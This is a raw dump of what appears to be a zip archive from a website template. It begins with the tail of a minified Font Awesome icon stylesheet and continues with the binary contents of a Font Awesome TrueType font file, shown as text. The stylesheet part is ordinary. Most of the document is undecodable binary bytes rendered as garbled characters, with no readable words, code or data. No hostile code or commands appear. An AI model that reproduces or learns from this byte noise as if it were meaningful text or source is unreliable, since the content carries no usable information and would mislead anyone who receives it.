\f226"}.fa-mars-double:before{content:"\f227"}.fa-venus-mars:before{content:"\f228"}.fa-mars-stroke:before{content:"\f229"}.fa-mars-stroke-v:before{content:"\f22a"}.fa-mars-stroke-h:before{content:"\f22b"}.fa-neuter:before{content:"\f22c"}.fa-genderless:before{content:"\f22d"}.fa-facebook-official:before{content:"\f230"}.fa-pinterest-p:before{content:"\f231"}.fa-whatsapp:before{content:"\f232"}.fa-server:before{content:"\f233"}.fa-user-plus:before{content:"\f234"}.fa-user-times:before{content:"\f235"}.fa-hotel:before,.fa-bed:before{content:"\f236"}.fa-viacoin:before{content:"\f237"}.fa-train:before{content:"\f238"}.fa-subway:before{content:"\f239"}.fa-medium:before{content:"\f23a"}.fa-yc:before,.fa-y-combinator:before{content:"\f23b"}.fa-optin-monster:before{content:"\f23c"}.fa-opencart:before{content:"\f23d"}.fa-expeditedssl:before{content:"\f23e"}.fa-battery-4:before,.fa-battery:before,.fa-battery-full:before{content:"\f240"}.fa-battery-3:before,.fa-battery-three-quarters:before{content:"\f241"}.fa-battery-2:before,.fa-battery-half:before{content:"\f242"}.fa-battery-1:before,.fa-battery-quarter:before{content:"\f243"}.fa-battery-0:before,.fa-battery-empty:before{content:"\f244"}.fa-mouse-pointer:before{content:"\f245"}.fa-i-cursor:before{content:"\f246"}.fa-object-group:before{content:"\f247"}.fa-object-ungroup:before{content:"\f248"}.fa-sticky-note:before{content:"\f249"}.fa-sticky-note-o:before{content:"\f24a"}.fa-cc-jcb:before{content:"\f24b"}.fa-cc-diners-club:before{content:"\f24c"}.fa-clone:before{content:"\f24d"}.fa-balance-scale:before{content:"\f24e"}.fa-hourglass-o:before{content:"\f250"}.fa-hourglass-1:before,.fa-hourglass-start:before{content:"\f251"}.fa-hourglass-2:before,.fa-hourglass-half:before{content:"\f252"}.fa-hourglass-3:before,.fa-hourglass-end:before{content:"\f253"}.fa-hourglass:before{content:"\f254"}.fa-hand-grab-o:before,.fa-hand-rock-o:before{content:"\f255"}.fa-hand-stop-o:before,.fa-hand-paper-o:before{content:"\f256"}.fa-hand-scissors-o:before{content:"\f257"}.fa-hand-lizard-o:before{content:"\f258"}.fa-hand-spock-o:before{content:"\f259"}.fa-hand-pointer-o:before{content:"\f25a"}.fa-hand-peace-o:before{content:"\f25b"}.fa-trademark:before{content:"\f25c"}.fa-registered:before{content:"\f25d"}.fa-creative-commons:before{content:"\f25e"}.fa-gg:before{content:"\f260"}.fa-gg-circle:before{content:"\f261"}.fa-tripadvisor:before{content:"\f262"}.fa-odnoklassniki:before{content:"\f263"}.fa-odnoklassniki-square:before{content:"\f264"}.fa-get-pocket:before{content:"\f265"}.fa-wikipedia-w:before{content:"\f266"}.fa-safari:before{content:"\f267"}.fa-chrome:before{content:"\f268"}.fa-firefox:before{content:"\f269"}.fa-opera:before{content:"\f26a"}.fa-internet-explorer:before{content:"\f26b"}.fa-tv:before,.fa-television:before{content:"\f26c"}.fa-contao:before{content:"\f26d"}.fa-500px:before{content:"\f26e"}.fa-amazon:before{content:"\f270"}.fa-calendar-plus-o:before{content:"\f271"}.fa-calendar-minus-o:before{content:"\f272"}.fa-calendar-times-o:before{content:"\f273"}.fa-calendar-check-o:before{content:"\f274"}.fa-industry:before{content:"\f275"}.fa-map-pin:before{content:"\f276"}.fa-map-signs:before{content:"\f277"}.fa-map-o:before{content:"\f278"}.fa-map:before{content:"\f279"}.fa-commenting:before{content:"\f27a"}.fa-commenting-o:before{content:"\f27b"}.fa-houzz:before{content:"\f27c"}.fa-vimeo:before{content:"\f27d"}.fa-black-tie:before{content:"\f27e"}.fa-fonticons:before{content:"\f280"}.fa-reddit-alien:before{content:"\f281"}.fa-edge:before{content:"\f282"}.fa-credit-card-alt:before{content:"\f283"}.fa-codiepie:before{content:"\f284"}.fa-modx:before{content:"\f285"}.fa-fort-awesome:before{content:"\f286"}.fa-usb:before{content:"\f287"}.fa-product-hunt:before{content:"\f288"}.fa-mixcloud:before{content:"\f289"}.fa-scribd:before{content:"\f28a"}.fa-pause-circle:before{content:"\f28b"}.fa-pause-circle-o:before{content:"\f28c"}.fa-stop-circle:before{content:"\f28d"}.fa-stop-circle-o:before{content:"\f28e"}.fa-shopping-bag:before{content:"\f290"}.fa-shopping-basket:before{content:"\f291"}.fa-hashtag:before{content:"\f292"}.fa-bluetooth:before{content:"\f293"}.fa-bluetooth-b:before{content:"\f294"}.fa-percent:before{content:"\f295"}.fa-gitlab:before{content:"\f296"}.fa-wpbeginner:before{content:"\f297"}.fa-wpforms:before{content:"\f298"}.fa-envira:before{content:"\f299"}.fa-universal-access:before{content:"\f29a"}.fa-wheelchair-alt:before{content:"\f29b"}.fa-question-circle-o:before{content:"\f29c"}.fa-blind:before{content:"\f29d"}.fa-audio-description:before{content:"\f29e"}.fa-volume-control-phone:before{content:"\f2a0"}.fa-braille:before{content:"\f2a1"}.fa-assistive-listening-systems:before{content:"\f2a2"}.fa-asl-interpreting:before,.fa-american-sign-language-interpreting:before{content:"\f2a3"}.fa-deafness:before,.fa-hard-of-hearing:before,.fa-deaf:before{content:"\f2a4"}.fa-glide:before{content:"\f2a5"}.fa-glide-g:before{content:"\f2a6"}.fa-signing:before,.fa-sign-language:before{content:"\f2a7"}.fa-low-vision:before{content:"\f2a8"}.fa-viadeo:before{content:"\f2a9"}.fa-viadeo-square:before{content:"\f2aa"}.fa-snapchat:before{content:"\f2ab"}.fa-snapchat-ghost:before{content:"\f2ac"}.fa-snapchat-square:before{content:"\f2ad"}.fa-pied-piper:before{content:"\f2ae"}.fa-first-order:before{content:"\f2b0"}.fa-yoast:before{content:"\f2b1"}.fa-themeisle:before{content:"\f2b2"}.fa-google-plus-circle:before,.fa-google-plus-official:before{content:"\f2b3"}.fa-fa:before,.fa-font-awesome:before{content:"\f2b4"}.fa-handshake-o:before{content:"\f2b5"}.fa-envelope-open:before{content:"\f2b6"}.fa-envelope-open-o:before{content:"\f2b7"}.fa-linode:before{content:"\f2b8"}.fa-address-book:before{content:"\f2b9"}.fa-address-book-o:before{content:"\f2ba"}.fa-vcard:before,.fa-address-card:before{content:"\f2bb"}.fa-vcard-o:before,.fa-address-card-o:before{content:"\f2bc"}.fa-user-circle:before{content:"\f2bd"}.fa-user-circle-o:before{content:"\f2be"}.fa-user-o:before{content:"\f2c0"}.fa-id-badge:before{content:"\f2c1"}.fa-drivers-license:before,.fa-id-card:before{content:"\f2c2"}.fa-drivers-license-o:before,.fa-id-card-o:before{content:"\f2c3"}.fa-quora:before{content:"\f2c4"}.fa-free-code-camp:before{content:"\f2c5"}.fa-telegram:before{content:"\f2c6"}.fa-thermometer-4:before,.fa-thermometer:before,.fa-thermometer-full:before{content:"\f2c7"}.fa-thermometer-3:before,.fa-thermometer-three-quarters:before{content:"\f2c8"}.fa-thermometer-2:before,.fa-thermometer-half:before{content:"\f2c9"}.fa-thermometer-1:before,.fa-thermometer-quarter:before{content:"\f2ca"}.fa-thermometer-0:before,.fa-thermometer-empty:before{content:"\f2cb"}.fa-shower:before{content:"\f2cc"}.fa-bathtub:before,.fa-s15:before,.fa-bath:before{content:"\f2cd"}.fa-podcast:before{content:"\f2ce"}.fa-window-maximize:before{content:"\f2d0"}.fa-window-minimize:before{content:"\f2d1"}.fa-window-restore:before{content:"\f2d2"}.fa-times-rectangle:before,.fa-window-close:before{content:"\f2d3"}.fa-times-rectangle-o:before,.fa-window-close-o:before{content:"\f2d4"}.fa-bandcamp:before{content:"\f2d5"}.fa-grav:before{content:"\f2d6"}.fa-etsy:before{content:"\f2d7"}.fa-imdb:before{content:"\f2d8"}.fa-ravelry:before{content:"\f2d9"}.fa-eercast:before{content:"\f2da"}.fa-microchip:before{content:"\f2db"}.fa-snowflake-o:before{content:"\f2dc"}.fa-superpowers:before{content:"\f2dd"}.fa-wpexplorer:before{content:"\f2de"}.fa-meetup:before{content:"\f2e0"}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0, 0, 0, 0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}
PKԜ�\\�DŬ���;purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.ttfnu&1i�
�PFFTMk�G���GDEF��p OS/2�2z@X`cmap
�:��gasp���hglyf���M�L�head��-�6hhea
�$hmtxEy��
�loca��\�maxp,8 name㗋�gh�post����k�uː�xY_<��3�2�3�2���	�	����	��'@i��3��3s�pyrs@ �� �pU�]�����y�n�����2��@������
��������z���Z@�5�5
���z���ZZ����@���������,_���@������s���@	��@��(������@�����@��@-
�M�M�-�
�M�M�����@�����@@�
�-����`��b����
���$����6�4�8�"�"""""���@�D@���,,@� ���������	m��)@�@	 	' D9>dY*	'						�	��	��T										�@	f�	%RE	 		$!k(D�'	��	�%��	�%	��	��0%�/�&��p@0 �����!"""`���>�N�^�n�~��������������.�>�N�^�n�~��������������>�N�^�n�~������������ �����!"""`���!�@�P�`�p�������������� �0�@�P�`�p��������������!�@�P�`�p�������������\�X�S�B�1����ݬ

	����������������������������������
�
	,,,,,,,,,,,,,��t�L�T$�l	x	�
T(��
d����l,����4d�pH�$d,t( � �!�"0# $,$�&D'�(�)T**�,,�-�.@.�/`/�00�1�2�3d444�5 5�5�6 6\6�7H7�88`8�9L9�:h:�;�<p=p><>�?h?�@H@�A0A�BXB�CdC�DLD�E�F�G0G�H�I�J8K�L�MdN,N�N�O�P`P�Q4Q�RRlS,S�T`U0W�X�Z[@[�\<\�]�^(^�_�`pb,b�dd�ePe�f�g`g�iLi�jDkk�l�m@n,oLp�q�r�sxtt�uD{`||�}}�~��������H��������l�@����������l�H� ���T��H�������`����@�����$�\�X��D�������T�X�����D�P�,���8���d�\����������������H���x��� �t���X���p��d��������x�t�������������@������Œ�\� ļ�ŸƔ�0���d��ʨˀ����͔�x��ϰЌ�,ш�҈�ӌ���8�,՜�`���l�Hش�`���Tڸ�۔�@���l��ބ�߬��l�p� ������������������������������4�����X���$�l���(����`����������	d

��
,�,��8��(�X���x|T�@��| �!�"x##l$$�'h(�*L,T.L1t1�2�303�4�5t6T7$89H::�;�<�<�?X@A�B�C�D�EHFHGpHHIxJ J�K�L�MN@P@Q�R�SDT ULV`V�WXX4X�ZZ�[d[�\|]�^�`�aHa�b�cXd�etfhg�h�i\jxn�p@s�vw�x�y�z�{h|�}}�\���l�t���4���������t���8�8���L���T�������������|�������|�������4�x�����L����������X�(� ������� ������@�����l���t����$����x�L�L��� �H������Ġ�T�(����ʈˠ��ϔ�l�d���P�Մ�x�p���ڬ�T�T���ވ�L�����<�H��$���l������4����������� �P�l����,���x���p�,�x�t��d����4���4,h�P	4
��
�4�<,,408$�8�T� |!h"�$L%0&H'�(�)�*0*�+�,�.$.�0�1�2@2�3�4t5$6�9 :�:�;;�<(<�=4?�@�A�C�D�F�H`H�I�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�p7!!!���@p�p �p�]���!2#!"&463!&54>3!2�+��@&&��&&@��+$(�($F#+���&4&&4&x+#��+".4>32".4>32467632DhgZghDDhg-iW�DhgZghDDhg-iW&@(8 ��2N++NdN+'�;2N++NdN+'�3
8���!  #"'#"$&6$ �������rL46$���܏���oo��o|W%r��������4L&V|o��oo����ܳ��%��=M%+".'&%&'3!26<.#!";2>767>7#!"&5463!2� %��3@m00m@3���% 
�
�@
���:"7..7":�6]�^B�@B^^B�B^ $΄+0110+��$�
(	

�t��1%%1��+�`��B^^B@B^^���"'.54632>32�4��
#L</��>�oP$$Po�>���Z$_d�C�+I@$$@I+��������"#"'%#"&547&547%62���V�?�?V��8��<��8y���
���b%	I�))�9I	����	+	%%#"'%#"&547&547%62q2�Z���Z2Izy���V)�?�?V��8��<��8)>~��>��[��
���
2���b%	I�))�9I	���%#!"&54>3 72 &6 }X��X}.GuL�l�LuG.�����>�m��mU��mE��Em�������>����/?O_o���54&+";2654&+";2654&+";264&#!"3!2654&+";2654&+";264&#!"3!2654&+";2654&+";2654&+";267#!"&5463!2�&�&&�&&�&&�&&�&&�&&�&&&�&�&&�&�&�&&�&��&�&&&�&�&&�&&�&&�&&�&&�&�^B��B^^B@B^@�&&�&&��&&�&&��&&�&&�&&�&&��&&�&&���&&�&&&&�&&���&&�&&��&&�&&��&&�&&���B^^B@B^^��/?#!"&5463!2#!"&5463!2#!"&5463!2#!"&5463!2L4�4LL44LL4�4LL44L�L4�4LL44LL4�4LL44L��4LL4�4LL��4LL4�4LL���4LL4�4LL��4LL4�4LL	�/?O_o�#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!28(��(88(@(88(��(88(@(8�8(��(88(@(8��8(��(88(@(8�8(��(88(@(8�8(��(88(@(8��8(��(88(@(8�8(��(88(@(88(��(88(@(8 �(88(�(88�(88(�(88��(88(�(88�(88(�(88��(88(�(88��(88(�(88�(88(�(88��(88(�(88�(88(�(88�/?O_#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!28(��(88(@(88(��(88(@(88(�@(88(�(8�8(��(88(@(88(�@(88(�(88(�@(88(�(8 �(88(�(88�(88(�(88��(88(�(88�(88(�(88��(88(�(88�(88(�(88y��"/&4?62	62��,�P����P&�P��P�,��jP�����n���#$"'	"/&47	&4?62	62	�P���P�&���P&&P���&�P�&���P&&P���&�P������#+D++"&=#"&=46;546;232  #"'#"$&6$ 
�
@
�

�
@
�
�������rK56$���܏���oo��o|W�@
�

�
@
�

��r��������jK&V|o��oo����ܳ�����0#!"&=463!2  #"'#"$&6$ 
��

@
�������rK56$���܏���oo��o|W�@

@
�r��������jK&V|o��oo����ܳ����)5 $&54762>54&'.7>"&5462z�����z��+i *bkQ��н�Qkb* j*����LhLLhL�����zz���Bm +*i J�yh��QQ��hy�J i*+ m��J��4LL4�4LL���/?O%+"&=46;2%+"&546;2%+"&546;2+"&546;2+"&546;2��������������`��r��@�@r�@��@����n4&"2#"/+"&/&'#"'&'&547>7&/.=46?67&'&547>3267676;27632�Ԗ����#H
	��,/
�1)�
~'H�
�(C
	�

�,/
�1)�	
�$H�
Ԗ�Ԗm�6%2X
%�	l�2
�k	r6

[21
�..9Q

$�
k�2
�k	
w3[20����/;Cg+"&546;2+"&546;2+"&546;2!3!2>!'&'!+#!"&5#"&=463!7>3!2!2@@@@@@���@�`�0
��
o`^B��B^`5FN(@(NF5 ��@��@��@���L%%Ju		�@�LSyuS�@�%44%�f5#!!!"&5465	7#"'	'&/&6762546;2�&�����&??�>

�L�L
>
� X ���
 � &���&��&AJ	A��	J
W���h��##!"&5463!2!&'&!"&5!�(8(��(88(�(`�x
��c�`(8��`(��(88(@(8(D��9�8(����� ,#!"&=46;46;2.  6 $$ ����@��������(�r���^����a�a�@@`��(��������_�^����a�a��2NC5.+";26#!26'.#!"3!"547>3!";26/.#!2W
�
��.�@

��

�@.�$S

�

S$�@

���9I


�
I6>
��
��>�%=$4&"2$4&"2#!"&5463!2?!2"'&763!463!2!2&4&&4&&4&&4�8(�@(88(ч:�:��(8���@6�@*&&*�4&&4&&4&&4& ��(88(@(8�88�8)�@�)'�&&�@���$0"'&76;46;232  >& $$ `
������������(���r���^����a�a`��		@`��2�������(���^����a�a�����$0++"&5#"&54762  >& $$ ^���
?@�����(���r���^����a�a���`?		����������(���^����a�a��
#!.'!!!%#!"&547>3!2�<�<�<_@`&��&�
5@5
�@����&&�>=(""��=���'#"'&5476.  6 $$ � ��  ! ��������(�r���^����a�a�J��	%�%���(��������_�^����a�a�����3#!"'&?&#"3267672#"$&6$3276&�@*���h��QQ��hw�I
�	m�ʬ����zz���k�)'�@&('��Q��н�Qh_
	�
��z�8�zoe����$G!"$'"&5463!23267676;2#!"&4?&#"+"&=!2762�@�h���k�4&&�&�G�a��F*�
&�@&��Ɇ�F*�
A��k�4&���nf�&�&&4�BH�rd�@&&4���rd
Moe�&�/?O_o+"&=46;25+"&=46;25+"&=46;2#!"&=463!25#!"&=463!25#!"&=463!24&#!"3!26#!"&5463!2�
@

@

@

@

@

@
�
�@

�

�@

�

�@

�
�
�@

�
�^B�@B^^B�B^`@

@
�@

@
�@

@
��@

@
�@

@
�@

@
�3@

��
M��B^^B@B^^��!54&"#!"&546;54 32@�Ԗ@8(�@(88( p (8�j��j��(88(@(8������8@���7+"&5&5462#".#"#"&5476763232>32@@
@
@KjK�ך=}\�I���&:�k�~&26]S
&H&�

�&H5KKu�t,4,�	&� x:;*4*&��K#+"&546;227654$ >3546;2+"&="&/&546$ �<��X@@Gv"D�����װD"vG@@X��<��4L4����1!Sk @ G<_b������b_<G �� kS!1����zz�� �"'!"&5463!62&4����&&M4&���&M&�&M& ��-"'!"&5463!62#"&54>4.54632&4����&&M4&�UF
&""""&
F���&M&�&M&���%/B/%���G-Ik"'!"&5463!62#"&54>4.54632#"&54767>4&'&'&54632#"&547>7676'&'.'&54632&4����&&M4&�UF
&""""&
FU��
&'8JSSJ8'&

����

&'.${��{$.'&

����&M&�&M&���%/B/%7���;&'6���6'&;��4�[&$
[2[
$&[��#/37#5#5!#5!!!!!!!#5!#5!5##!35!!!����������������������������������������������������������������������������#'+/37;?3#3#3#3#3#3#3#3#3#3#3#3#3#3#3#3#3????  ^��>>~??�??�??~??~??^??�^^?  ^??������������������������������������4&"2#"'.5463!2�KjKKjv%�'45%�5&5L4�5�&�%jKKjK�@5%�%%�%�5�4L5&�6'��k�54&"2#"'.5463!2#"&'654'.#32�KjKKjv%�'45%�5&5L4�5�&�%�%�'4$.�%%�5&�5�5�&�%jKKjK�@5%�%%�%�5�4L5&�6'45%�%�%54'�&55&�6'
��y�Tdt#!"&'&74676&7>7>76&7>7>76&7>7>76&7>7>63!2#!"3!2676'3!26?6&#!"3!26?6&#!"g(��sA�eM�,*$/
!'&
�JP��$G]��
x�6,&��`
��
h`
��
"9H�v@WkNC<.
&k&
("$p"	.
#u&#	%!'	pJ�vwEF�#

@

��

@

���2#"'	#"'.546763�!''!0#�G�G$/!''!�	
8"��"8
 ��X!	
8"	"8
	����<)!!#"&=!4&"27+#!"&=#"&546;463!232������(8���&4&&4�
�8(�@(8�
qO@8(�(`�(@Oq��8(��&4&&4&@�`
�(88(�
�Oq (8(�`(�q���!)2"&42#!"&546;7>3!2  I��j��j��j��j�3e55e3�gr������`��I�j��j��j�j��1GG1���r��������P2327&7>7;"&#"4?2>54.'%3"&#"#ժ!�9&W��B03&�K5�!�)V�?�@L��'�	
>R�>e;&L:�:%P�>��vO
'h�� N��_"�:-&+#
��:��	'	����+a%3 4'.#"32>54.#"7>7><5'./6$3232#"&#"+JBx)EB_I:I*CRzb3:dtB2P���$$5.3b�ZF�|\8!-T>5��Fu��\,�,j�n OrB,<!
5�4wJ]�?tTFi;
2�3j.�p^%/2�+
	S:T}K4W9: #ƕd�fE���:7>7676'5.'732>7"#"&#&#"OA
zj=N!�}:0e��%	y�
+t�D3�~U#B4#
g		'2
%/!:
���T	bRU,7����}%2"/&6;#"&?62+326323!2>?23&'.'.#"&"$#"#&=>764=464.'&#"&'�!~:~!PP!~:~!P��6�,�,$�$%*'
c2N 	
(�$"L��A2�3Yl�!x!*�%��%%��%��
p�P,T	NE	Q7^���oH!+(
3	 *Ue�eu
wg��a�32632$?23&'.5&'&#"&"5$#"#&=>7>4&54&54>.'&#"&'2#".465!#".'&47>32!4&4>Q6�,�,Faw!*'
=~Pl*	
(�$"L��A2�3Yl	�)�!*<7@@7<
�
<7@@7<
 p�P,T	MF
Q7�47ƢHoH!+(
3	 t���JHQ6wh��',686,'$##$',686,'$##$�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&��&�&&&&�&&&��&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&��&��&&�&&��&&�&��&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&�&&&&�&&&&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&��&&�&&��&&�&&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?O_o%+"&=46;2+"&=46;2+"&=46;2#!"&=463!2+"&=46;2#!"&=463!2#!"&=463!2#!"&=463!2
�

�

�

�

�

�

��

@
�
�

�

��

@

��

@

��

@
�

�
s�

�
s�

�
��

�
s�

�
��

�
s�

�
s�

�
�/?O#"'&47632#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2�
	��		 	
�
�@

�

��

@

��

@

�@

�
�
	 		 	��

�
s�

�
s�

�
s�

�
�/?O#"&54632	#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2`	��	

	 �
�@

�

��

@

��

@

�@

�
�	��	
@
	��	�

�
s�

�
s�

�
s�

�
#"'#!"&5463!2632'
�m�w�@w��w�w��
'���*��w��w�w��w������."&462!5	!"3!2654&#!"&5463!2�p�pp�p��@���

@
�^B��B^^B@B^�pp�p���@�@� 
�@

�
 �@B^^B�B^^���k%!7'34#"3276'	!7632k[�[�v
��
6����`�%��`�$65&�%[�[k����
�`����5%���&&�'���4&"2"&'&54 �Ԗ���!��?H?��!,�,Ԗ�ԖmF��!&&!Fm�,�����%" $$ ���������^����a�a`@������^����a�a���-4'.'&"26% 547>7>2"KjK��X��QqYn	243nYqQ�$!+!77!+!$5KK���,ԑ�	���]""]ً�	��9>H7'3&7#!"&5463!2'&#!"3!26=4?6	!762xt�t` �� ^Q�w��w��w@?61��B^^B@B^	@(` �`��\\��\P�`t�t8`� �� ^�Ͼw��w@w�1^B��B^^B~
	@��` \ \�P�+Z#!"&5463!12+"3!26=47676#"'&=# #"'.54>;547632��w��w��w�
M8
pB^^B@B^�
'���sw-

9*##;No��j�'
�#��w��w@w�
"^B��B^^B�

	��*�����
"g`�81T`PSA:'�*��4�/D#!"&5463!2#"'&#!"3!26=4?632"'&4?62	62��w��w��w@?61

��B^^B@B^	@

��B�RnB�Bn^��w��w@w�1
^B��B^^B�
	@
���Bn���nB�C"&=!32"'&46;!"'&4762!#"&4762+!5462�4&���&�4�&���&4�4&��&4&��&4�4�&���&4�4&��&4&��&4�4&���&����6'&'+"&546;267��:	&�&&�&	s�@�	
�Z&&�&&�Z
	���+6'&''&'+"&546;267667��:	�:	&�&&�&	�	s�@�	
�:�	
�Z&&�&&�Z
	��:
	z����6'&''&47667S�:	�:�	s�@�	
�:�4��:
	�|�	&546h��!!0a�
�
�
$���#!"&5463!2#!"&5463!2&�&&&��&�&&&@��&&�&&��&&�&&���#!"&5463!2&��&&�&@��&&�&&���&54646&5-�	��:	s��:	
��:4�:�
	���+&5464646;2+"&5&5-�	�	&�&&�&	�:	s��:	
��:	
�&&��&&�
	�:�
	���&54646;2+"&5-�	&�&&�&	s��:	
�&&��&&�
	62#!"&!"&5463!2�4��@��&&�&&-��:��&&&�&�����	"'&4762����4��4����4��4��4Z��f�	"/&47	&4?62S�4����4����44��4���#/54&#!4&+"!"3!;265!26 $$ �&�&�&�&&&�&&@���^����a�a@�&&&�&�&�&&&+�^����a�a�����54&#!"3!26 $$ �&�&&&@���^����a�a@�&&�&&+�^����a�a�����+74/7654/&#"'&#"32?32?6 $$ }��Z��Z��Z��Z����^����a�a���Z��Z��Z��Z�^����a�a�����#4/&"'&"327> $$ [4�h�4[j����^����a�a"Z�i�Z��J�^����a�a�����:F%54&+";264.#"32767632;265467>$ $$ ���o�W��	5!"40K(0?i�+! ":����^����a�a����X�R�dD4!&.uC$=1/J=�^����a�a�����.:%54&+4&#!";#"3!2654&+";26 $$ `��``��������^����a�a�����������^����a�a�����/_#"&=46;.'+"&=32+546;2>++"&=.'#"&=46;>7546;232�m&&m �l&�&l� m&&m �l&�&l�s&�%�&�&��%�&&�%�&�&��%�&&�&l� m&&m �l&�&l� m&&m �,�&��%�&&�%�&�&��%�&&�%�&���#/;"/"/&4?'&4?627626.  6 $$ I�

��

�

��

�

��

�

��
͒������(�r���^����a�aɒ

��

�

��

�

��

�

��
(��������_�^����a�a����� ,	"'&4?6262.  6 $$ ��Z4��f4�4fz�������(�r���^����a�a�Z&4f�f4�(��������_�^����a�a�����	"4'32>&#" $&6$  W���oɒV�󇥔�� z�����zz�8�����YW�˼�[����?����zz�:�zz�@�5K #!#"'&547632!2A4�@%&&K%54'�u%%�&54&K&&���4A��5K��$l$L%%�%54'�&&J&j&��K�5�K #"/&47!"&=463!&4?632�%�u'43'K&&%�@4AA4���&&K&45&�%@6%�u%%K&j&%K5�5K&$l$K&&�u#5��K@!#"'+"&5"/&547632K%K&56$��K5�5K��$l$K&&�#76%�%53'K&&%�@4AA4���&&K&45&�%%�u'5��K�"#"'&54?63246;2632K%�u'45%�u&&J'45%&L4�4L&%54'K%�5%�t%%�$65&K%%���4LL4�@&%%K'���,"&5#"#"'.'547!3462�4&�b��qb>#5���&4�4�&6Uu�e7D#		"�dž�&����/#!"&546262"/"/&47'&463!2�
���&�@&&4�L

r&4���

r

L�&�&�
���4&&�&�L

rI�@&���

r

L�4&&
���s/"/"/&47'&463!2#!"&546262&4���

r

L�&�&�
���&�@&&4�L

r@�@&���

r

L�4&&�
���4&&�&�L

r��##!+"&5!"&=463!46;2!2�8(�`8(�(8�`(88(�8(�(8�(8 �(8�`(88(�8(�(8�(88(�`8��#!"&=463!2�8(�@(88(�(8 �(88(�(88z���5'%+"&5&/&67-.?>46;2%6�.@g.��L4�4L��.g@.
��.@g.
L4�4L
.g@.���g.n.���4LL43�.n.g��g.n.�34LL4�͙.n.g����-  $54&+";264'&+";26/�a����^�����
�

�


�

�����^����a�a��
�
fm��
@
J%55!;263'&#"$4&#"32+#!"&5#"&5463!"&46327632#!2���$�$�8�~+(88�8(+}�(�`8(��(8`�]��]k=��=k]��]��8���,8e�8P88P8�����`(88(�@���M��M����N4&#"327>76$32#"'.#"#"&'.54>54&'&54>7>7>32&����z&^��&.������/+>+)>J>	W��m7����'
'"''? &4&c��&^|h_b��ml/J@L@#*
#M6:D
35sҟw$	'%
'	\�t��3#!"&=463!2'.54>54''�
��

@
�1O``O1CZ��Z71O``O1BZ��Z7�@

@
N�]SHH[3`�)Tt��bN�]SHH[3^�)Tt���!1&' 547 $4&#"2654632 '&476 ���=������=嘅�����}�(zVl��'��'���ٌ@�uhy����yhu����9(�}Vz��D#���#D#�������	=CU%7.5474&#"2654632%#"'&547.'&476!27632#76$7&'7+NWb=嘧�}�(zV�j�\i1
z,��X��
Y[6
$!%���'F��u�J�iys�?_�9ɍ?�kyhu�n(�}Vz����YF
KA؉L�a
�0��2�-�F"@Q���sp@�_���!3%54&+";264'&+";26#!"&'&7>2
�

�


�
�
#%;"�";%#<F<������7


���??""??�$$ll2#"'&'	+&/&'&?632	&'&?67>`,@L�����5
`		��
`	�����L�`4�L��H`
����`	��
a	5�
��L@��#37;?Os!!!!%!!!!%!!!!!!!!%!!4&+";26!!%!!!!74&+";26%#!"&546;546;2!546;232� ��`@���� ��`@���� ���@����@�� ��@����
@

@
� ��@��� �� 
@

@
�L4��4LL4�^B@B^�^B@B^�4L� �� @@��@@ � � � @@  

��
��@@ �� � 

��
M�4LL44L`B^^B``B^^B`L���7q.+"&=46;2#"&=".'673!54632#"&=!"+"&=46;2>767>3!54632�<M33K,��	��	
 j8Z4L2B4:;M33K,?		��	
�0N<* .)C=W]xD��0N<* .)C=W]xD?\�-7H)��	��	
�".=']�-7H)�
��w	��	
�<?.>mBZxPV3!�<?.>mBZxPV3!�
���&#"'&'5&6&>7>7&54>$32�d�FK��1A
0)����L���.���٫�C58.H(Y���e����#3C $=463!22>=463!2#!"&5463!2#!"&5463!2���H���&�&/<R.*.R</&�&�&��&&�&&��&&�&������Bɀ&&�4L&&L4�&&f��&&�&&��&&�&&Z� %"'	"/&4762��4���4��4�ͥ���5��5Z����	"'&4?62	62��4��44���5����5��%K%#!".<=#"&54762+!2"'&546;!"/&5463!232
�@�&@<@&�@	����:��&���	�
��& 

��&���&���
����&��	

��`&���:$"&462"&462!2#!"&54>7#"&463!2!2�LhLLh�LhLLh�!��
�&&�&��&&�&4hLLhLLhLLhL��%z<
0&4&&)17&4&
&&��#!"&5463!2!2��\�@\��\@\��\���@\��\�\��\ �W�*#!"&547>3!2!"4&5463!2!2W��+�B��"5P+�B@"5����^�=���\@\� \�H#�t3G#�3G:�_H�t�\��\ �@��+32"'&46;#"&4762�&��&�4�&��&4�4&�&4�4&&4�@�"&=!"'&4762!5462�4&�&4�4&&4�4�&��&4&��&����
!!!3!!��������������������������0@67&#".'&'#"'#"'32>54'6#!"&5463!28ADAE=\W{��O[/5dI
kDt���pČe1?*�w�@w��w�w��	(M&
B{Wta28r=Ku?RZ^Gw��T	-�@w��w�w�����$2+37#546375&#"#3!"&5463�w��w���/Dz?s�����w��w��w�@w�S�88�	�����w�w����#'.>4&#"26546326"&462!5!&  !5!!=!!%#!"&5463!2�B^8(�Ԗ���������>��������@�|�K5�5KK55K�^B(8Ԗ�Ԗ�€>�������v����5KK55KK�H��G4&"&#"2654'32#".'#"'#"&54$327.54632@p�p)*Ppp�p)*P�b	'"+`�N*(�a���;2��̓c`." b
PTY9��ppP*)p�ppP*)�b ".`�(*N��ͣ�2�ͣ����`+"'	b
MRZB�����4&"24&"264&"26#"/+"&/&'#"'&547>7&/.=46?67&'&547>3267676;27632#"&'"'#"'&547&'&=4767&547>32626?2#"&'"'#"'&547&'&=4767&547>32626?2��Ԗ���LhLKjKLhLKjK��	�"8w
s%(�")v

�
>�
	�"8x
s"+�")v
�<�
��3zLLz3��
3>8L3)x3
��3zLLz3��
